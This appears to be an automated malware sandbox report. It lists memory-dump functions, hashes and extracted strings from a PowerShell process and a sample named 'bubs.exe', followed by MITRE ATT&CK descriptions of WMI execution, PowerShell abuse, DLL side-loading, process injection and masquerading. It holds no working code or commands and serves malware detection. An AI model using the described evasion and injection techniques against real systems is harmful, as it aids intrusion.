Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 38d25888b6cb35b846392ae057d3a4370e0732bcf0f03dabce9278a2786c1fbf
Instruction ID: e28602d6c3a9c3270814c3e05861997b787d488fd3399f39eb830d404efecafc
Opcode Fuzzy Hash: 38d25888b6cb35b846392ae057d3a4370e0732bcf0f03dabce9278a2786c1fbf
Instruction Fuzzy Hash: 90912C3170DA4C4FD765EB2CA8656B6BBD1FF9A321F1502BBE04DC7262D91D9C828381

Function 00007FFD348CC705 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

]K_H, xrefs: 00007FFD348CC76D

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID: ]K_H
API String ID: 0-566813307
Opcode ID: 2f3422a41a67c0cfa2e90d6a15120a928408702b47264f86e654de96335f2804
Instruction ID: 89466e610b2d3bb312bf8cda0a46f5790038abe2ac75b2f1cab958783a1d27d1
Opcode Fuzzy Hash: 2f3422a41a67c0cfa2e90d6a15120a928408702b47264f86e654de96335f2804
Instruction Fuzzy Hash: FF51B930709A494FD7A5DF6CD4A8A65BBE1FF4A71170900BBE48DC7262DB28EC81C781

Function 00007FFD348CB248 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2218448e65a36fb8a65bc46d87db765fac57368046ed3051515a8bb04b3b46ac
Instruction ID: a9c915eda0baab7c478742ab6e15ed282e0008a14e7051cba9798c507840cf27
Opcode Fuzzy Hash: 2218448e65a36fb8a65bc46d87db765fac57368046ed3051515a8bb04b3b46ac
Instruction Fuzzy Hash: D3223B3460894D8FDF98EF1CC898AA977E1FF69305B0501AAE95ED72A1DA35EC41CB40

Function 00007FFD348CD92F Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf42ca060b0c08f2c4393e40ae717f57b9e6a745a279b5c5968357cd37d15f2
Instruction ID: 4a0ac0b0e672f8810b001220a1c94e9c55de0e9c604989a2e32ab7961c658d82
Opcode Fuzzy Hash: ebf42ca060b0c08f2c4393e40ae717f57b9e6a745a279b5c5968357cd37d15f2
Instruction Fuzzy Hash: 3971313770C5295AE724BBBDB8651E977A4FF86335F081277D28CCE083E968748686D0

Function 00007FFD348CC15D Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b8202cc3b2b25365f2c7fac6e34880ac15ae4edbb477aec6a885f928500415
Instruction ID: aa0136b1984104d97c75bfb7bbd970e1a9555565f6b75767ec1c6ad62a6a2df2
Opcode Fuzzy Hash: a9b8202cc3b2b25365f2c7fac6e34880ac15ae4edbb477aec6a885f928500415
Instruction Fuzzy Hash: C8818121F18D1A4FEBA4E76C95A56B9A3D2FF99710B404176D15EC32D6EE2CBC428380

Function 00007FFD348CD65E Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ac5a4a34a21ca9970eb32911f3e5c04affd7b4e79686ea963ade82573a78bd
Instruction ID: dfbee3310c390e9d2cd6e1f8ac5c2be80b55ee4a1304888dbe857efa69848acf
Opcode Fuzzy Hash: 85ac5a4a34a21ca9970eb32911f3e5c04affd7b4e79686ea963ade82573a78bd
Instruction Fuzzy Hash: 7D510431B1C9584FDB59E72898A57B9B7E5EF8A300F0001FBD44EC7297DE28AC028781

Function 00007FFD348CB7D8 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c7f1091f74eac0aa22ae5ee626d4b7de9c8d54948cde1b441325686fe19b27
Instruction ID: d1f008d7b37d68a5c7dc5eeeafb64b009e51658bd044a8abc1373e34deffa939
Opcode Fuzzy Hash: 13c7f1091f74eac0aa22ae5ee626d4b7de9c8d54948cde1b441325686fe19b27
Instruction Fuzzy Hash: 64515922B0CA490FFBA5A73C54B92B9BBC1DF9A214B1801BBD64DC31D7DD1DAC469381

Function 00007FFD348CFB00 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
Instruction ID: 70547ebe6cb9af6933878e3b0d6ea72feb8f5171047865ffcfeabb52da3011ad
Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
Instruction Fuzzy Hash: 7141E73131581C8FDAD8EB1CE898E6877E1FF6C31271505E6E54ACB275DA26DC81CB40

Function 00007FFD348CB038 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb0e6c771f34c203bbe23b1e358c81920d60369d75ec8f721200f747778d401
Instruction ID: 81b842e7148296cc9c29fbc3d85b6dc20ded72c5c2612f01fccd2bba5262958c
Opcode Fuzzy Hash: 0cb0e6c771f34c203bbe23b1e358c81920d60369d75ec8f721200f747778d401
Instruction Fuzzy Hash: B0417025B0895D4BFB94DB1894A53B9B6D2EB99350F50017BE60DD32CADE2DAC029780

Function 00007FFD348CB790 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f94183fcfa9eba635235d47cb4d5fab188ee128542d21aaca499bde633cb395
Instruction ID: 740bdb19a4f32443d366adb04930c755f529a8c627b58fd410b347a05d7b41a4
Opcode Fuzzy Hash: 5f94183fcfa9eba635235d47cb4d5fab188ee128542d21aaca499bde633cb395
Instruction Fuzzy Hash: 34416D20B0C90A4FEBA4F76C91A4AB5A3D1EF5A315B18057BD24EC32DADD2DFC819740

Function 00007FFD348CF0F5 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ca75400ff7df991a91dcf3beca51e5ad21d4cc0f50d1102da9496e4baaca26
Instruction ID: 7278b3f6af4157f9b78d87ef739aa44278c1341da4cf1eb18ec88d2ba3f68451
Opcode Fuzzy Hash: 58ca75400ff7df991a91dcf3beca51e5ad21d4cc0f50d1102da9496e4baaca26
Instruction Fuzzy Hash: EC41F421B0CA8A4FFB5ADB2899A52B8BBE0EF56310F4401BBD64DC71D6CD2D5C469381

Function 00007FFD348CB718 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26118a6a41a4fbc5a88fa97f729ffd0e816a140dda067fd9768d58d36384a101
Instruction ID: bfc2be727be81d9677de0aab6abadc38f69828837782c101181d5f117dd31452
Opcode Fuzzy Hash: 26118a6a41a4fbc5a88fa97f729ffd0e816a140dda067fd9768d58d36384a101
Instruction Fuzzy Hash: 33310730B0D9494FEBA9D72CC4A4B64B7D1EF9A300F1440BAD64EC72D6C91CAC82C740

Function 00007FFD348CF179 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e34c344ee6da92b5ae789600c49b4244fa283992eab2f449ae5f2463b8048d2
Instruction ID: 659976ff54ec4701f16eaaf1ac05c429928cb359a5fc6118b872cb45e0fe87ea
Opcode Fuzzy Hash: 4e34c344ee6da92b5ae789600c49b4244fa283992eab2f449ae5f2463b8048d2
Instruction Fuzzy Hash: 8B31BC31A0CA4E4FFB95DB2894A53A9BBE1EF8A310F04017BE609C32C6CE2C5C458781

Function 00007FFD348CB020 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b437f91a6a8863cd92531c8f8fdc04c4912a21d152f60f89c01d0c5f8e762031
Instruction ID: eafa2b2cac73b2d410e5274573fcb66e847b546f08d30a7d1a84a621371287f9
Opcode Fuzzy Hash: b437f91a6a8863cd92531c8f8fdc04c4912a21d152f60f89c01d0c5f8e762031
Instruction Fuzzy Hash: EB319031A0890E4BFBA4EB5895A57FAB7E1EF89310F00013BE60DD32C5DE796C558680

Function 00007FFD348CE621 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168ab5fe765d6e5dac7138f4d91df78f84a6bce519007b91ace485f80b1108cb
Instruction ID: b2bbdb297e7f826a332f7d3db01cfa63341491cd76dfd8c96debc378ef7586cd
Opcode Fuzzy Hash: 168ab5fe765d6e5dac7138f4d91df78f84a6bce519007b91ace485f80b1108cb
Instruction Fuzzy Hash: 3721A230668E4C8FCB94EB2CD594965B3E1FF5931174505BED48AC7AA1DA29FC41CB00

Function 00007FFD348CFAE1 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7792e6ea12396793759a5f6b994e68bbc213e1bd35bfde3f5eb8576a219fd9d1
Instruction ID: 9ce72c51c3c12c27402b851b9f970606fcfb6ff55004febb212d86e9b641cd29
Opcode Fuzzy Hash: 7792e6ea12396793759a5f6b994e68bbc213e1bd35bfde3f5eb8576a219fd9d1
Instruction Fuzzy Hash: C911823174D8884FE795EB2CD8AC964BFE0EF6A31231A05E7E188CB1B6DA15DC80C740

Function 00007FFD348CB392 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c612e27d93a0b0155fc1675f6f0552a47ca563ee597a695c57b61ee4e6ca3d6
Instruction ID: 7f806d56cb54e1e0ccf72e3a41d26c2195423fb67fd38e3257f832c09ef0be41
Opcode Fuzzy Hash: 5c612e27d93a0b0155fc1675f6f0552a47ca563ee597a695c57b61ee4e6ca3d6
Instruction Fuzzy Hash: 68015672F0CA194BE7589A5C74532B9B3D1EB89674F04023FE58ED3282DE166C434186

Function 00007FFD348CB3A6 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 461ecc03c81bc8d80a785ad0967812045213a0071b32fe052eb3ecee03930681
Instruction ID: 58cf5d2877d3eceb7bb60af77bb39aa8b35e98ab53c85a4c194d4e1418348034
Opcode Fuzzy Hash: 461ecc03c81bc8d80a785ad0967812045213a0071b32fe052eb3ecee03930681
Instruction Fuzzy Hash: 96015672F0CA184BE7589A5C74571B9B3D1EB89674F04023FE18ED3282DE166C1351C5

Function 00007FFD348CB3B7 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997d8e01f035ffebb4d5776efbd1a27c55eb18638bc58a2f01cec10f7d7f5945
Instruction ID: f3f35cc9ac15d0d0f720ab049d7e31590718a1f5120b4550f3799cbe1e2768a6
Opcode Fuzzy Hash: 997d8e01f035ffebb4d5776efbd1a27c55eb18638bc58a2f01cec10f7d7f5945
Instruction Fuzzy Hash: A2017972F0C6194BE7589A5C74571B9B3D1E789674F04023FE28ED3281DE256C0341C5

Function 00007FFD348CFC42 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f337e113b9fde00bba690cd4d46b74f56e5525b3d0bf70b64ae52ff1422e62cb
Instruction ID: 8197c79d6e08dbaf01cb165944f7b03c5396bb41e0c3ebad96a358441d39aec0
Opcode Fuzzy Hash: f337e113b9fde00bba690cd4d46b74f56e5525b3d0bf70b64ae52ff1422e62cb
Instruction Fuzzy Hash: 1721333060DA894FDB95DB28C5A4F61BBE1EF56304F1944EAD54DCB2E3CA19EC85CB00

Function 00007FFD348C3885 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 39ba4525b47be548b6f6d194f93208c3c46fa2b3a69cec13c19b348cc6709fc5
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 3001677121CB0C4FD744EF4CE491AA5B7E0FB99364F50056EE58AC3651D636E882CB45

Function 00007FFD348CFD69 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80db86765be89efc4c7613b610f63283813427ea60f4bb67acec45453ed31f75
Instruction ID: df533cb28dd8f1333fece052dfa7377265443d37c25ff0c1ec7ea64d0dd813b9
Opcode Fuzzy Hash: 80db86765be89efc4c7613b610f63283813427ea60f4bb67acec45453ed31f75
Instruction Fuzzy Hash: ECF0E56160E9945FD7A6DB3C8864A957FF1FF8B34070A44EBE18CCB1A7D5189C0893A1

Non-executed Functions

Function 00007FFD348C4D12 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

^, xrefs: 00007FFD348C4DC9

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: e8105fdf6eb385898faf3d2d02788c090972000c13cb94607c1d1a29389fc604
Instruction ID: 5b9273bcb39b3f9a5ce9305d9fec25cea26f3866bd54e30abc2328422bf2b012
Opcode Fuzzy Hash: e8105fdf6eb385898faf3d2d02788c090972000c13cb94607c1d1a29389fc604
Instruction Fuzzy Hash: 6121A057E0DAC26AF762533C18E60DA6BD5DF5327470962B3CB97CA083AE0D0C47A212

Function 00007FFD348C3C1D Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f6f5bbf453f9bcf42366ed67bd552538ad278926ccaca00215371e41f1033d
Instruction ID: b4b61ed43157f5edbaa0bd52b330d1f00e7929e5130bdc19d5cbfe32057ac3ee
Opcode Fuzzy Hash: a2f6f5bbf453f9bcf42366ed67bd552538ad278926ccaca00215371e41f1033d
Instruction Fuzzy Hash: F7E1B227B0D7D25BE323536C69F61E97BA4DF53379B0900B7C684CA093ED1D180B9252

Function 00007FFD348C4DFB Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7496eedb801afb622b9a89d6e73bdf0f95b28a2ba11395ea6f682d5437099667
Instruction ID: e7acc1af8d0292a066eead408c0b4987acea7c2cbdbdb776986080e195ff4afa
Opcode Fuzzy Hash: 7496eedb801afb622b9a89d6e73bdf0f95b28a2ba11395ea6f682d5437099667
Instruction Fuzzy Hash: 9F41D013F0DA964BE762A37C69F60EAAFD0DF5362830902F7C989C6053ED1C5C469291

Function 00007FFD348C84C8 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FFD348C86C9
K_^, xrefs: 00007FFD348C857A
K_^, xrefs: 00007FFD348C866A
K_^, xrefs: 00007FFD348C85C2

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^
API String ID: 0-4267328068
Opcode ID: fcf2390ffbd15e10bb4c13121f94a2cd521fde63b845c7aab407de2db8c05952
Instruction ID: 5b10fff1a5755a0962946f243227753b0eaf84545d0331d098a4a8014fd0678a
Opcode Fuzzy Hash: fcf2390ffbd15e10bb4c13121f94a2cd521fde63b845c7aab407de2db8c05952
Instruction Fuzzy Hash: D8618573A0E6915FE712A7BCA9F51D57BA0AF1331C70C05F7D198CB193E92CB40A9245

Function 00007FFD348C86FA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FFD348C8772
K_^, xrefs: 00007FFD348C872A
K_^, xrefs: 00007FFD348C86FA
K_^, xrefs: 00007FFD348C8712

Memory Dump Source

Source File: 00000001.00000002.2474238426.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd348c0000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^
API String ID: 0-4267328068
Opcode ID: 373964b02882a8cda309ad687e4ffee4fe0d13cb681dc5922dd630e3f0b66141
Instruction ID: 81bb44f697c5f36969c6ca2d8c29638be45bd2ad4f6076c89018323bfbf289e8
Opcode Fuzzy Hash: 373964b02882a8cda309ad687e4ffee4fe0d13cb681dc5922dd630e3f0b66141
Instruction Fuzzy Hash: C421F6F3A499C95BEB568B1E9DA51D577E0FF23348B4C04B6C5A8C7243FE28A8065141

Analysis Process: bubs.exePID: 4140, Parent PID: 2664COMMON

Executed Functions

Function 6C531D18 Relevance: 20.0, Strings: 14, Instructions: 2463COMMON

Download Yara Rule

Strings

vf|, xrefs: 6C53474C
vf|, xrefs: 6C53530D
vf|, xrefs: 6C533CEF
vf|, xrefs: 6C53293D
vf|, xrefs: 6C5334D3
vf|, xrefs: 6C534F04
vf|, xrefs: 6C53436E
vf|, xrefs: 6C532D1B
}T, xrefs: 6C532017
vf|, xrefs: 6C534B2B
vf|, xrefs: 6C53233F
vf|, xrefs: 6C535720
vf|, xrefs: 6C5338DC
vf|, xrefs: 6C5330FA

Memory Dump Source

Source File: 00000003.00000002.2416744717.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000003.00000002.2416689657.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417392665.000000006CA0C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417488014.000000006CAA4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417508059.000000006CAA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417561941.000000006CAA8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417584038.000000006CAA9000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417605126.000000006CAAA000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.2417659518.000000006CAAD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c530000_bubs.jbxd

Similarity

API ID:
String ID: vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$}T
API String ID: 0-804482046
Opcode ID: 7b1e5ea4ee1718be713331d264dc524011c145c12f6e901233a5a53122d26da7
Instruction ID: e984052a88df390b05250638156e0860d9f9b990e27d296a04146a9ed83a9ad6
Opcode Fuzzy Hash: 7b1e5ea4ee1718be713331d264dc524011c145c12f6e901233a5a53122d26da7
Instruction Fuzzy Hash: 13537035A012298BDB64CA29CD89BDDB3F2BF98318F1485D9D84CA7250E771AEC5CF40

Function 002D1000 Relevance: 20.0, Strings: 14, Instructions: 2462COMMON

Download Yara Rule

Strings

vf|, xrefs: 002D22E6
}T, xrefs: 002D1079
vf|, xrefs: 002D1750
vf|, xrefs: 002D26EF
vf|, xrefs: 002D1B2E
vf|, xrefs: 002D4114
vf|, xrefs: 002D1F0D
vf|, xrefs: 002D2B02
vf|, xrefs: 002D12F9
vf|, xrefs: 002D3553
vf|, xrefs: 002D3932
vf|, xrefs: 002D3175
vf|, xrefs: 002D3D0B
vf|, xrefs: 002D4527

Memory Dump Source

Source File: 00000003.00000002.2414429709.00000000002D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000003.00000002.2414383580.00000000002D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2414983151.000000000075F000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d0000_bubs.jbxd

Similarity

API ID:
String ID: vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$vf|$}T
API String ID: 0-804482046
Opcode ID: a5e224554f7a098d9725b87248df2391a6328a408b48bb48234411da78131e2e
Instruction ID: 8d7b42cb0c04b094e4c79c278b3762226017844cc6ea1a180cc0994d7089009d
Opcode Fuzzy Hash: a5e224554f7a098d9725b87248df2391a6328a408b48bb48234411da78131e2e
Instruction Fuzzy Hash: 8E437035E012298BDB68CA69CD89BDDB7F2BF99318F1485D9D808A7240D731AEC5CF41

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

